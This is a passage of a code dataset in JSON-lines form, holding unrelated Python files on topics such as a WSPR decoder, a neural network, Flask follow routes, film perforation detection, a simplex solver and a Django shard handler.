\"legacy\" in SELECTED_GENS\n CORE_ENABLED = \"core\" in SELECTED_GENS\n\nelse:\n # if no selection was provided, select those for which we have emulators\n try:\n EmulatorWrapper(\"legacy\")\n LEGACY_ENABLED = True\n except Exception:\n LEGACY_ENABLED = False\n\n try:\n EmulatorWrapper(\"core\")\n CORE_ENABLED = True\n except Exception:\n CORE_ENABLED = False\n\n\nlegacy_only = pytest.mark.skipif(\n not LEGACY_ENABLED, reason=\"This test requires legacy emulator\"\n)\n\ncore_only = pytest.mark.skipif(\n not CORE_ENABLED, reason=\"This test requires core emulator\"\n)\n","sub_path":"tests/upgrade_tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"595631572","text":"'''\n--------------------------\nAuthor: Rashaad Bhamjee\nDate: March 14, 2016\n--------------------------\nWalks through a directory and outputs a CSV of the ArcGIS readable files in it
\n(feature classes, rasters, tables, textfiles, etc.)\n---------------------------------------------------------------------------------------------------\nHOW TO USE:\n\t1. Change workspace to the directory you want to analyze\n\t2. Change output to where you want the csv file to go\n---------------------------------------------------------------------------------------------------\n\nREVISIONS:\n\n---------------------------------------------------------------------------------------------------\n'''\n\nimport arcpy, csv, os\n\nworkspace = r\"C:\\Users\\BhamjeeR\\Documents\"\noutput = r\"C:\\Users\\BhamjeeR\\Documents\\FilesInDir_ArcGISfiles.csv\"\n\nwith open(output, 'wb') as csvfile:\n csvwriter = csv.writer(csvfile)\n for dirpath, dirnames, filenames in arcpy.da.Walk(workspace):\n for filename in filenames:\n desc = arcpy.Describe(os.path.join(dirpath, filename))\n csvwriter.writerow([desc.catalogPath, desc.name, desc.dataType])","sub_path":"FileDirAnalyzer_arcgisfiles.py","file_name":"FileDirAnalyzer_arcgisfiles.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"524619411","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 14 12:00:15 2019\r\n\r\nANN - first layer ReLU or tanh, second layer softmax.\r\n\r\n@author: Kubus\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom util import getData, softmax, cost, cost2, y2indicator, error_rate, relu\r\nfrom sklearn.utils import shuffle\r\n\r\nclass ANN(object):\r\n def __init__(self,M):\r\n self.M = M\r\n \r\n def fit(self, X,Y, learning_rate=10e-06, reg=10e-1, epochs=10000, show_fig=False):\r\n X, Y = shuffle(X,Y)\r\n Xvalid, Yvalid = X[-1000:], Y[-1000:]\r\n Tvalid = y2indicator(Yvalid)\r\n X, Y = X[:-1000], Y[:-1000]\r\n N, D = X.shape\r\n K = len(set(Y))\r\n T = y2indicator(Y)\r\n \r\n self.W1 = np.random.randn(D, self.M) / np.sqrt(D+ self.M)\r\n self.b1 = np.zeros(self.M)\r\n self.W2 = np.random.randn(self.M, K) / np.sqrt(self.M + K)\r\n self.b2 = np.zeros(K)\r\n \r\n costs = []\r\n best_validation_error = 1\r\n for i in range(epochs):\r\n # forward propagation\r\n pY, Z = self.forward(X)\r\n \r\n #gradient descent step\r\n pY_T = pY - T\r\n self.W2 -= learning_rate*(Z.T.dot(pY_T) + reg*self.W2)\r\n self.b2 -= learning_rate*(pY_T.sum(axis=0) + reg*self.b2) # sum over the batch axis; a scalar .sum() was a bug\r\n \r\n # dZ = pY_T.dot(self.W2.T) * (Z > 0) # relu\r\n dZ = pY_T.dot(self.W2.T) * (1 - Z*Z) # tanh\r\n self.W1 -= learning_rate*(X.T.dot(dZ) + reg*self.W1)\r\n self.b1 -= learning_rate*(np.sum(dZ, axis=0) + reg*self.b1)\r\n \r\n if i % 10 == 0:\r\n pYvalid, _ = self.forward(Xvalid)\r\n c = cost(Tvalid, pYvalid)\r\n costs.append(c)\r\n e = error_rate(Yvalid, np.argmax(pYvalid, axis=1))\r\n print(\"i: \", i, \"cost: \", c, \"error: \", e)\r\n if e < best_validation_error:\r\n best_validation_error = e\r\n print(\"best validation error = \", best_validation_error)\r\n \r\n if show_fig:\r\n plt.plot(costs)\r\n plt.show()\r\n \r\n def forward(self, X):\r\n Z= np.tanh(X.dot(self.W1) + self.b1) # for tanh\r\n #Z = relu(X.dot(self.W1) + self.b1)\r\n return softmax(Z.dot(self.W2) + self.b2), Z\r\n \r\n def predict(self, X):\r\n pY, _ = self.forward(X)\r\n return np.argmax(pY, axis=1)\r\n\r\n def score(self, X, Y):\r\n prediction = self.predict(X)\r\n return 1 - error_rate(Y, prediction)\r\n\r\n\r\ndef main():\r\n X, Y = getData()\r\n \r\n model = ANN(100)\r\n model.fit(X,Y, show_fig=True)\r\n print(model.score(X,Y))\r\n \r\nif __name__ == '__main__':\r\n
main()","sub_path":"ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"92103675","text":"from django import forms\n\nfrom workshops.models import Skill\n\nINSTRUCTOR_SEARCH_LEN = 10 # how many instrutors to return from a search by default\n\n\nclass InstructorMatchForm(forms.Form):\n '''Represent instructor matching form.'''\n\n wanted = forms.IntegerField(label='Number Wanted',\n initial=INSTRUCTOR_SEARCH_LEN,\n min_value=1)\n latitude = forms.FloatField(label='Latitude',\n min_value=-90.0,\n max_value=90.0)\n longitude = forms.FloatField(label='Longitude',\n min_value=-180.0,\n max_value=180.0)\n\n def __init__(self, *args, **kwargs):\n '''Build checkboxes for skills dynamically.'''\n super(InstructorMatchForm, self).__init__(*args, **kwargs)\n skills = Skill.objects.all()\n for s in skills:\n self.fields[s.name] = forms.BooleanField(label=s.name, required=False)\n","sub_path":"workshops/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"39720118","text":"import os\nimport json\nfrom pathlib import Path\n\nphotosList = os.listdir(\"./photos\")\nprint(photosList)\ndef getInput(text):\n print(text)\n output = input(\"> \")\n\nparentDir=Path(__file__).resolve().parent\n\nparentDir=f\"{parentDir}\".split(\"/\")\nparentDir=parentDir[-1]\nprint(parentDir)\nbaseJson={\n \"hero\":\"photos/hero.jpg\",\n \"title\":\"Whatever the title of this essay is.\",\n \"fontType\":\"serif\",\n \"brand\":{\n \"logo\":\"the 2020 daily recap\",\n \"href\":\"https://2020.darcylf.me\"\n },\n \"photos\":[]\n}\n\nfor i in photosList:\n if (i != \"hero.jpg\"):\n coolDict = {\n \"imageURL\":f\"photos/{i}\",\n \"caption\":\"edit me\"\n }\n\n \n baseJson[\"photos\"].append(coolDict)\ncoolDict = {\n \"imageURL\":f\"photos/hero.jpg\",\n \"caption\":\"edit me\"\n}\n\n \nbaseJson[\"photos\"].append(coolDict)\n\njsonFile = f\"{parentDir}.json\"\nprint(jsonFile)\n\nwith open(jsonFile, \"w\") as write_file:\n json_object = json.dumps(baseJson, indent = 4) \n write_file.write(json_object) \n","sub_path":"template/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"224113558","text":"import os\nimport subprocess\nimport sys\n\nfrom libCore import *\n\n \n \n#\n# Takes in WSPR messages\n# Converts to decoded structures\n#\nclass WSPRDecoder:\n def __init__(self):\n pass\n \n def CanBeDecoded(self, name__value):\n retVal = False\n \n call = self.GetDecodedCallsign(name__value)\n if call == \"KD2KDD\" or call == \"KN4IUD\":\n retVal = True\n \n return retVal\n \n def DecodeList(self, nvList):\n retVal = []\n \n for name__value in nvList:\n retVal.append(self.Decode(name__value))\n \n return retVal\n \n \n # The callsign buffer will be used for:\n #\n # Position Values Usage (number of values)\n # Callsign 1 Q,0 Telemetry Channel (2)\n # Callsign 2 0-9,A-Z Speed (9)\n # Altitude 1,000ft increment (2)\n # Altitude 5000ft increment (2)\n # Callsign 3 0-9 Telemetry Channel (10)\n # Callsign 4 A-Z Grid Square 5th char (A-X) (24)\n # Callsign 5 A-Z Grid Square 6th char (A-X) (24)\n # Callsign 6 A-Z, space Temperature(8)\n # Voltage(3)\n def Decode(self, name__valueInput):\n # first, assume all decoded fields are the same as input\n name__value = 
dict(name__valueInput)\n \n # now, go through rules to determine what fields to add/modify\n name__value[\"CALLSIGN_DECODED\"] = self.GetDecodedCallsign(name__valueInput)\n name__value[\"SPEED_MPH\"] = self.GetDecodedSpeedMph(name__valueInput)\n name__value[\"ALTITUDE_FT\"] = self.GetDecodedAltitudeFt(name__valueInput)\n name__value[\"GRID_DECODED\"] = self.GetDecodedGrid(name__valueInput)\n name__value[\"TEMPERATURE_C\"] = self.GetDecodedTemperatureC(name__value)\n name__value[\"VOLTAGE\"] = 0\n \n return name__value\n \n def GetDecodedCallsign(self, name__value):\n retVal = None\n \n if len(name__value[\"CALLSIGN\"]) >= 6:\n id = str(name__value[\"CALLSIGN\"][0]) + str(name__value[\"CALLSIGN\"][2])\n \n #if id == \"00\":\n # retVal = \"KD2KDD\"\n \n if id == \"06\":\n retVal = \"KN4IUD\"\n if id == \"12\":\n retVal = \"KD2KDD\"\n if id == \"Q4\":\n retVal = \"KN4IUD\"\n \n return retVal\n \n def GetDecodedSpeedMph(self, name__value):\n speedKnotsIncr, ftIncr1000Val, ftIncr500Val = self.DecodeCallsign2(name__value)\n \n speedKnots = speedKnotsIncr * 16\n speedMph = round(speedKnots * 1.151)\n \n return speedMph\n \n def GetDecodedAltitudeFt(self, name__value):\n retVal = 0\n \n speedKnotsIncr, ftIncr1000Val, ftIncr500Val = self.DecodeCallsign2(name__value)\n ftIncr2000Val = self.DecodePower(name__value)\n \n retVal = (2000 * ftIncr2000Val) + (1000 * ftIncr1000Val) + (500 * ftIncr500Val)\n \n return retVal\n \n def GetDecodedGrid(self, name__value):\n grid0to4 = name__value[\"GRID\"]\n grid5to6 = name__value[\"CALLSIGN\"][3:5]\n \n grid0to6 = grid0to4 + grid5to6\n \n return grid0to6\n \n def GetDecodedTemperatureC(self, name__value):\n temperatureC = self.DecodeCallsign6(name__value)\n \n temperatureC = -50 + (temperatureC * 4)\n \n return temperatureC\n \n def DecodePower(self, name__value):\n dbm = name__value[\"DBM\"][1:] ;# strip the +\n \n powerList = [ 0, 3, 7, 10, 13, 17, 20, 23, 27, 30, 33, 37, 40, 43, 47, 50, 53, 57, 60 ]\n \n idxMatch = 0\n \n idx = 0\n for power in powerList:\n if dbm == str(power):\n idxMatch = idx\n \n idx += 1\n \n retVal = idxMatch\n \n return retVal\n \n def DecodeCallsign2(self, name__value):\n c2Val = self.UnMapFromAlphaNum(name__value[\"CALLSIGN\"][1])\n \n ftIncr500Val, c2Val = self.UnPack(c2Val, 2)\n ftIncr1000Val, c2Val = self.UnPack(c2Val, 2)\n speedKnotsIncr, c2Val = self.UnPack(c2Val, 9)\n \n return speedKnotsIncr, ftIncr1000Val, ftIncr500Val\n\n def DecodeCallsign6(self, name__value):\n c6Val = self.UnMapFromAlphaSpace(name__value[\"CALLSIGN\"][5])\n \n temperatureC, c6Val = self.UnPack(c6Val, 27)\n \n return temperatureC\n \n \n def UnMapFromAlphaNum(self, val):\n retVal = 0\n \n if val.isalpha():\n retVal = 10 + (ord(val) - ord('A'))\n else:\n retVal = ord(val) - ord('0')\n \n return retVal\n \n def UnMapFromAlphaSpace(self, val):\n retVal = 0\n \n if val == \" \":\n retVal = 26\n else:\n retVal = ord(val) - ord('A')\n \n return retVal\n \n \n def UnPack(self, unpackSource, valueCount):\n unpackVal = unpackSource % valueCount\n unpackSourceAdjusted = unpackSource // valueCount\n \n return unpackVal, unpackSourceAdjusted\n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"lib/libWSPRDecoder.py","file_name":"libWSPRDecoder.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"336037287","text":"import pandas as pd\nimport os\nfrom glob import glob\nimport pdb\nimport sys\nfrom PIL import Image\n\npath =
'/media/yosunpeng/storehouse/SunFiles/datasets/pascal-voc/trainval/VOCdevkit/VOC2012/ImageSets/Main/'\n\n#location_dog = '/home/yosunpeng/Desktop/Main/dog_train.txt'\n#location_cat = '/home/yosunpeng/Desktop/Main/dog_train.txt'\n\n\ndef labels(path, model):\n if model=='train':\n list_train = glob(os.path.join(path, '*_train.txt'))\n #print(list_train)\n elif model=='trainval':\n list_train = glob(os.path.join(path, '*_trainval.txt'))\n elif model=='val':\n list_train = glob(os.path.join(path, '*_val.txt'))\n else:\n sys.exit('wrong model name, please check spelling: train, trainval or val') \n #print(os.path.basename(list_train[1]))\n list_train.sort()\n list_name = []\n for i in range(len(list_train)):\n x = os.path.basename(list_train[i])\n list_name.append(x.split(sep='_'))\n\n list_name = [ x[0] for x in list_name ]\n dict_name = { i : list_name[i] for i in range(len(list_name)) }\n\n for i, _path in enumerate(list_train):\n if i==0:\n train_labels = pd.read_csv(_path, names=[0, dict_name.get(0)] , delim_whitespace=True, header=None)\n else:\n _append = pd.read_csv(_path, names=[i, dict_name.get(i)], delim_whitespace=True, header=None)\n train_labels = pd.concat([train_labels, _append[dict_name.get(i)]], axis=1)\n\n\n _list = list(dict_name.values()).insert(0, 0)\n train_labels = train_labels.set_index(0)\n del train_labels.index.name\n train_labels.rename(index=str, columns=_list)\n\n\n #pdb.set_trace()\n if model=='train':\n train_labels.to_csv(os.path.join(path, 'train.csv'))\n #print(list_train)\n elif model=='trainval':\n train_labels.to_csv(os.path.join(path, 'trainval.csv'))\n else:\n train_labels.to_csv(os.path.join(path, 'val.csv'))\n return train_labels\n #pdb.set_trace()\n #for train in list_train:\n\ndef load_labels():\n # \n labels_train = labels(path, 'train')\n labels_val = labels(path, 'val')\n return labels_train.values, labels_val.values\n#labels(path, 'train')\n#labels(path, 'trainval')\n#labels(path, 'val')\n#pdb.set_trace()\n","sub_path":"old/labels.py","file_name":"labels.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"315382548","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pyroomacoustics as pra\n\ndistance = 0.5\n\nroom = pra.ShoeBox([6, 6], fs=48000)\n\nroom.add_source([1, 5.5])\n\nR = np.c_[\n [3-distance*3, 3], # Mic 1\n [3-distance/2, 3], # Mic 2\n [3+distance/2, 3], # Mic 3\n [3+distance*3, 3] # Mic 4\n]\n\n","sub_path":"00Junk00/OldStuff/AudioLocalizationTest/DoA_Test.py","file_name":"DoA_Test.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"186473358","text":"import numpy as np\nimport imageio as im\nimport matplotlib.pyplot as plt\n# Import math, image-handling and plotting libraries\n\n# Define the im2double and im2uint8 functions, since Python lacks \n# built-in equivalents\ndef im2double(im):\n info = np.iinfo(im.dtype) # Get the image's data type\n # Divide all values by the maximum\n return im.astype(np.float64) / info.max \n\ndef im2uint8(im):\n info = np.iinfo(np.uint8) # Get the image's data type\n # Multiply by the maximum value\n temp = im*info.max\n temp[temp>info.max] = info.max\n temp[temp<0] = 0\n return temp.astype(np.uint8)\n\n@user.route(\"/<username>\")\ndef user_profile(username):\n user = User.query.filter(User.username == username).first_or_404()\n return render_template(\"user/user.html\",
user=user)\n\n\n@user.route(\"/follow/<username>\")\n@login_required\ndef follow(username):\n user = User.query.filter(User.username == username).first()\n if user is None:\n flash(f\"User {username} was not found\", \"danger\")\n return redirect(url_for('main.home'))\n if user == current_user:\n flash('You cannot follow yourself!')\n return redirect(url_for('user.user_profile', username=username))\n current_user.follow(user)\n db.session.commit()\n flash(f\"You are following {username}\", \"success\")\n return redirect(url_for('user.user_profile', username=username))\n\n\n@user.route('/unfollow/<username>')\n@login_required\ndef unfollow(username):\n user = User.query.filter_by(username=username).first()\n if user is None:\n flash(f\"User {username} was not found\", \"danger\")\n return redirect(url_for('main.home'))\n if user == current_user:\n flash('You cannot unfollow yourself!', \"danger\")\n return redirect(url_for('user.user_profile', username=username))\n current_user.unfollow(user)\n db.session.commit()\n flash(f\"You are not following {username}\", \"success\")\n return redirect(url_for('user.user_profile', username=username))","sub_path":"user/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"177498640","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri 19 Jul 2019\n\n@author: daiana and fmozo\n\"\"\"\n################################### Imports ###########################################\nimport cv2\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage as ndi\nimport numpy as np\n\nfrom project.functions import processing\n#######################################################################################\n\n\ndef find_perf(I):\n ##############################################################\n ## Returns an image with the detected perforations and a ##\n ## matrix (cube) of perforation corners in (II,SI,SD,ID) order ##\n ##############################################################\n\n ret, J = cv2.threshold(I,200,255,cv2.THRESH_TOZERO)\n\n kernel = np.ones((5,5),np.uint8)\n J = cv2.erode(J,kernel,iterations = 2)\n kernel = np.ones((4,4),np.uint8)\n J = cv2.dilate(J,kernel, iterations = 2)\n\n ret, J = cv2.threshold(J,200,255,cv2.THRESH_BINARY)\n\n found_perf = np.zeros(J.shape)\n J = cv2.cvtColor(J, cv2.COLOR_BGR2GRAY)\n contours,_ = cv2.findContours(J, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n perf_corners = np.zeros((40,4,2)).astype(int)\n index = 0\n for cnt in contours:\n rect = cv2.minAreaRect(cnt)\n # box = rect vertices, counter-clockwise, starting\n # at the top-right corner\n box = np.int0(cv2.boxPoints(rect))\n\n # Compute the rectangles' measurements of interest\n x_min = np.amin(box, axis=0)[0]\n x_max = np.amax(box, axis=0)[0]\n\n y_min = np.amin(box[:,1])\n y_max = np.amax(box[:,1])\n\n # filter by area and side lengths\n h,w = y_max-y_min, x_max-x_min\n area = h*w\n area_range_ok = (area >3200) and (area<105000)\n dim_proportion_ok = np.abs(h-w) < 30\n if area_range_ok and dim_proportion_ok :\n cv2.drawContours(found_perf,[box],0,(255),3)\n\n # reorder the vertices and store them\n x1 = box[0,0]\n x3 = box[2,0]\n aux = box.copy() # aux = box reordered\n if x1 >= x3 : # needs rotating\n aux[0,:],aux[1,:],aux[2,:],aux[3,:], = box[1,:],box[2,:],box[3,:],box[0,:]\n perf_corners[index,:,:] = aux[:,:]\n index += 1\n\n perf_corners[index,:,:] = np.ones((4,2)).astype(int)*(-1)\n return found_perf,
perf_corners\n#######################################################################################\n\n\ndef calc_rotation(oriented_corners):\n ###############################################################\n # computes the angle to rotate by, by averaging slopes ##\n ###############################################################\n angles = np.zeros((1, 30))\n ang_index = 0\n index = 0\n while oriented_corners[index, 0, 0] != -1:\n x1, y1 = oriented_corners[index, 1, 0], oriented_corners[index, 1, 1]\n x2, y2 = oriented_corners[index, 2, 0], oriented_corners[index, 2, 1]\n angles[0, ang_index] = processing.angle(x1, y1, x2, y2)\n ang_index += 1\n\n x1, y1 = oriented_corners[index, 0, 0], oriented_corners[index, 0, 1]\n x2, y2 = oriented_corners[index, 3, 0], oriented_corners[index, 3, 1]\n angles[0, ang_index] = processing.angle(x1, y1, x2, y2)\n ang_index += 1\n index += 1\n angles[0, ang_index] = -1\n\n # average all the computed angles\n i = 0\n ang_mean = 0\n while angles[0, i] != -1:\n ang_mean += angles[0, i]\n i += 1\n ang_mean = ang_mean / i\n return ang_mean\n#######################################################################################\n\n\ndef borde(franja):\n\n blur = cv2.GaussianBlur(franja,(5,5),0)\n\n edges = cv2.Laplacian(blur, -1, ksize = 5)\n\n _, binaria = cv2.threshold(edges,80,255,cv2.THRESH_BINARY)\n binaria = cv2.cvtColor(binaria, cv2.COLOR_RGB2GRAY)\n\n ### Line detection applied to the Laplacian\n\n rho = 1 # distance resolution in pixels of the Hough grid\n theta = np.pi / 180 # angular resolution in radians of the Hough grid\n threshold = 40 # minimum number of votes (intersections in Hough grid cell)\n min_line_length = 160 # minimum number of pixels making up a line\n max_line_gap = 0 # maximum gap in pixels between connectable line segments\n line_image = np.copy(binaria) * 0 # creating a blank to draw lines on\n\n\n # Run Hough on edge detected image\n # Output \"lines\" is an array containing endpoints of detected line segments\n lines = cv2.HoughLinesP(binaria, rho, theta, threshold, np.array([]),\n min_line_length, max_line_gap)\n\n for line in lines:\n for x1,y1,x2,y2 in line:\n cv2.line(line_image,(x1,y1),(x2,y2),(255,0,0),1)\n\n return line_image, lines\n#######################################################################################\n\n\ndef det_frame(I, x, superior, inferior, derecho):\n\n sup = I[int(x[0,0,1]): int(x[0,1,1]), int(x[0,0,0]):, :]\n img1, bordesup = borde(sup)\n superior.append(int(x[0,0,1]) + np.max(bordesup[:,0,1]))\n\n inf = I[int(x[1,0,1]): int(x[1,1,1]), int(x[1,0,0]):, :]\n img2, bordeinf = borde(inf)\n inferior.append(int(x[1,0,1]) + np.min(bordeinf[:,0,1]))\n\n # Take a +20/-20 margin above and below to avoid possible errors\n inter = I[int(x[0,0,1]) + bordesup[0,0,1] + 20: int(x[1,0,1]) + bordeinf[0,0,1] - 20, int(x[0,0,0]) + 400: , :]\n img3, bordeder = borde(inter)\n derecho.append(int(x[0,0,0]) + 400 + np.min(bordeder[:,0,0]))\n\n return superior, inferior, derecho\n#######################################################################################\n\n\ndef manual_input(I):\n\n plt.figure()\n plt.imshow(I)\n plt.title('Marque esquinas superior izquierda e inferior derecha del frame:')\n p = plt.ginput(2)\n\n plt.show(block=False)\n plt.pause(3)\n plt.close()\n\n return int(p[0][1]), int(p[1][1]), int(p[0][0]),
int(p[1][0])\n#######################################################################################\n","sub_path":"project/functions/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"475892128","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\nfrom helpers.geometry import get_distance\nfrom src.ClosedFigure import ClosedFigure\n\n\nclass Circle(ClosedFigure):\n def __init__(self, border_color, inner_color, center_point, border_points):\n super().__init__(\n center_point=center_point,\n border_color=border_color,\n inner_color=inner_color,\n border_points=border_points,\n )\n\n def render(self, qp):\n qp.setPen(self.pen)\n qp.setBrush(self.inner_color)\n radius = get_distance(self.center_point, self.border_points[0])\n qp.drawEllipse(self.center_point, radius, radius)\n","sub_path":"src/Circle.py","file_name":"Circle.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"545682558","text":"from typing import Optional\nfrom RestrictionSystem import RestrictionSystem\nfrom sys import float_info\nfrom SimplexMethod import SimplexTable\n\nclass ConsistentRefinementOfEstimates(SimplexTable):\n def __init__(self, system: Optional[RestrictionSystem] = None):\n SimplexTable.__init__(self, system)\n\n def __check_objective_function__(self):\n for v in self.__objective_function__.coefficients:\n if v < 0:\n return False\n return True\n\n def __valid_simplex_table__(self):\n valid = super().__valid_simplex_table__()\n if valid:\n return True\n return self.__check_objective_function__()\n \n def __one_step__(self):\n rows = []\n for i in range(len(self.__rows__)):\n if self.__rows__[i].free_member < 0:\n rows.append(i)\n rows = sorted(rows, key=lambda v: self.__rows__[v].free_member)\n for row_number in rows: \n best_column = None\n bestValue = float_info.max\n row = self.__rows__[row_number]\n for j in range(len(row.coefficients)):\n if row.coefficients[j] < 0 and self.__objective_function__.coefficients[j] > 1e-7:\n value = -self.__objective_function__.coefficients[j] / \\\n row.coefficients[j]\n if value < bestValue:\n bestValue = value\n best_column = j\n if best_column != None:\n self.__create_basis__(row_number, best_column)\n return True\n return False\n\n def __find_all_basis__(self):\n \"\"\"\n Looks for the bases that existed previously.\n Returns True if a basis was found for every row.\n \"\"\"\n if self.full_basis():\n return True\n count_variable = len(self.__objective_function__.coefficients)\n for j in range(count_variable):\n first_row = None\n second_row = None\n for i in range(0, len(self.__rows__)):\n row = self.__rows__[i]\n if abs(row.coefficients[j]) > 1e-7:\n if first_row != None:\n second_row = i\n break\n else:\n first_row = i\n if second_row == None and first_row != None:\n self.__create_basis__(first_row, j)\n return self.full_basis()\n\n def one_step(self):\n if not self.__find_all_basis__():\n return self.init()\n if self.__check_objective_function__():\n return self.__one_step__()\n elif super().__valid_simplex_table__():\n return super().__one_step__()\n else: \n return self.init()\n \n","sub_path":"Lab5/OM_5/ConsistentRefinementOfEstimates.py","file_name":"ConsistentRefinementOfEstimates.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"}
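The ConsistentRefinementOfEstimates record above ends here. Its __one_step__ applies a dual-simplex-style pivot rule: take the row whose free member is most negative, then pivot on the column that minimises -c_j/a_ij over entries with a_ij < 0 and c_j > 0. A minimal, self-contained sketch of that rule on a plain list-of-lists tableau (hypothetical helper names; this is not part of any record in this file and only assumes the rule quoted above):

def dual_simplex_pivot(tableau, objective):
    """One pivot of the rule above. Tableau rows are [a_1, ..., a_n, free_member];
    objective is [c_1, ..., c_n]. Returns False once every free member is >= 0."""
    bad = [i for i, row in enumerate(tableau) if row[-1] < 0]
    if not bad:
        return False
    i = min(bad, key=lambda k: tableau[k][-1])  # most negative free member
    cols = [j for j in range(len(objective))
            if tableau[i][j] < 0 and objective[j] > 1e-7]
    if not cols:
        raise ValueError("no admissible pivot column")  # system is inconsistent
    j = min(cols, key=lambda k: -objective[k] / tableau[i][k])
    p = tableau[i][j]
    tableau[i] = [v / p for v in tableau[i]]  # normalise the pivot row
    for k in range(len(tableau)):  # eliminate column j from the other rows
        if k != i and tableau[k][j]:
            f = tableau[k][j]
            tableau[k] = [v - f * w for v, w in zip(tableau[k], tableau[i])]
    f = objective[j]  # reduce the objective row so c_j becomes 0
    for j2 in range(len(objective)):
        objective[j2] -= f * tableau[i][j2]
    return True

# Tiny usage example: x + y >= 2 rewritten as -x - y + s = -2, objective x + 2y.
T = [[-1.0, -1.0, 1.0, -2.0]]
c = [1.0, 2.0, 0.0]
while dual_simplex_pivot(T, c):
    pass  # ends with T[0][-1] == 2.0, i.e. x = 2, y = 0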
+{"seq_id":"343394571","text":"from django.http import JsonResponse\nfrom dsproj_app.classes.Shards import Shards\nfrom hashlib import sha1\nimport urllib.parse\nimport requests\nimport re\nfrom json import dumps, loads\nfrom dsproj_app.classes.Store import Store\nimport random\nfrom os import environ\nfrom dsproj_app.views import get_array_views\n\n# return JSON pls\ndef shard_handler(request, method, route, details):\n shards = details[\"shards\"]\n store = details[\"store\"]\n # route is //\n print(\"route: \", route)\n if method == \"GET\":\n if \"my_id\" in route:\n return get_id(shards)\n elif \"all_ids\" in route:\n return get(shards)\n elif \"members\" in route:\n return get_members_in_ID(shards, route.split(\"/\")[1])\n elif \"count\" in route:\n return get_key_count_of_ID(shards, store, route.split(\"/\")[1])\n elif method == \"PUT\":\n body_unicode = request.body.decode(\"utf-8\")\n body = urllib.parse.parse_qs(body_unicode)\n if \"make_invalid\" in route:\n print(\"BODY: \")\n print(body)\n\n invalid_store = body[\"store\"][0]\n return make_invalid(invalid_store, store)\n \n num_shards = body[\"num\"][0]\n should_broadcast = True\n if \"broadcaster\" in body:\n should_broadcast = False\n return put(shards, num_shards, store, should_broadcast)\n # GET /shard/my_id\n # GET /shard/all_ids\n # GET /shard/members/\n # GET /shard/count/\n # PUT /shard/changeShardNumber -d=”num=”\n\n # PUT /shard/changeShardNumber -d=”num=”\n # Should initiate a change in the replica groups such that the key-values are redivided\n # across groups and returns a list of all shard ids, as in GET /shard/all_ids\n # {“result”: “Success”,\n # “shard_ids”: “0,1,2”},\n # Status = 200\n # If is greater than the number of nodes in the view, please return:\n # {“result”: “Error”,\n # “msg”: “Not enough nodes for shards”},\n # Status = 400\n # If there is only 1 node in any partition as a result of redividing into shards,\n # abort the operation and return:\n # {“result”: Error”,\n # “msg”: “Not enough nodes. 
shards result in a non-fault-tolerant shard”},\n # Status = 400\n # The only time one should have 1 node in a shard is if there is only one node in the entire system.\n # In this case it should only return an error message if you try to increase the number of shards beyond 1,\n # you should not return the second error message in this case.\n\ndef make_invalid(invalid_store, store):\n invalid_store = loads(invalid_store)\n for key, val in invalid_store.items():\n store.add(key, \"this-is-invalid\", {})\n return JsonResponse({}, status=200)\n\n\ndef put(shards, num_shards, store, should_broadcast):\n response = shards.update(num_shards, store)\n if should_broadcast == True:\n payload_to_send = {\"num\": num_shards, \"broadcaster\": False}\n ips = get_array_views()\n my_ip = environ.get(\"IP_PORT\")\n for ip in ips:\n if ip == my_ip:\n continue\n url = \"http://\" + ip + \"/shard/changeShardNumber\"\n requests.put(url, data=payload_to_send)\n status = None\n if response[\"is_successful\"]:\n status = 200\n return JsonResponse(response, status=status)\n else:\n status = 400\n return JsonResponse(response, status=status)\n\n\n# returns all id's\n# GET /shard/my_id\n# Should return the container’s shard id\n# {“id”: <shard_id>},\n# Status = 200\n\n\ndef get_id(shards):\n response = {\"id\": shards.get_my_shard()}\n return JsonResponse(response, status=200)\n\n\n# return specific id\n# GET /shard/all_ids\n# Should return a list of all shard ids in the system as a string of comma separated values.\n# {“result”: “Success”,\n# “shard_ids”: “0,1,2”},\n# Status = 200\n\n\ndef get(shards):\n response = {\"shard_ids\": shards.get_keys()}\n return JsonResponse(response, status=200)\n\n\n# returns all the IP_PORTS associated with that shard ID\n# GET /shard/members/<shard_id>\n# Should return a list of all members in the shard with id <shard_id>.\n# Each member should be represented as an ip-port address.
